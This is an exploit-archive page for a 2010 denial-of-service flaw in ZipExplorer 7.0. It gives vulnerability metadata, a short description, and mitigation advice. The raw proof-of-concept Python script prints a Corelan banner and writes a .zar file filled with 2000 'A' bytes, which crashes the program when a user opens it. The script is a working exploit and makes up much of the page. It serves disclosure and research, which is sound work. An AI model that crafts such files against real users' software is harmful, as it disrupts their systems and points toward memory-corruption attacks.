header-logo
Suggest Exploit
vendor:
ZipExplorer
by:
TecR0c
7,8
CVSS
HIGH
Denial of Service
N/A
CWE
Product Name: ZipExplorer
Affected Version From: 7.0
Affected Version To: 7.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP sp3 En
2010

ZipExplorer 7.0 (.zar) DoS

A denial of service vulnerability exists in ZipExplorer 7.0 when a specially crafted .zar file is opened. An attacker can exploit this vulnerability by sending a malicious .zar file to the target user and convincing them to open it. This will cause the application to crash, denying service to legitimate users.

Mitigation:

Users should avoid opening files from untrusted sources. Additionally, users should ensure that they are running the latest version of ZipExplorer 7.0.
Source

Exploit-DB raw data:

#!/usr/bin/python
#
# Title:                ZipExplorer 7.0 (.zar) DoS
# Advisory:             http://www.corelan.be:8800/advisories.php?id=10-045
# Author:               TecR0c - http://tecninja.net/blog
# Found by:             TecR0c - http://twitter.com/TecR0c
# Date:                 June 1st, 2010
# Download:             http://home.online.no/~arnholm/org/exe/ZipX70sh.exe
# Platform:             Windows XP sp3 En
# Greetz to:            Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.

# Usage: Launch Application > Open > Navigate to file > Double click > BOOM

print "|------------------------------------------------------------------|"
print "|                         __               __                      |"
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |"
print "|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |"
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |"
print "| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |"
print "|                                                                  |"
print "|                                       http://www.corelan.be:8800 |"
print "|                                              security@corelan.be |"
print "|                                                                  |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "[+] ZipExplorer 7.0 (.zar) DoS - by TecR0c"

dos = "\x41" * 2000

mefile = open('tecr0c.zar','w');
mefile.write(dos);
mefile.close()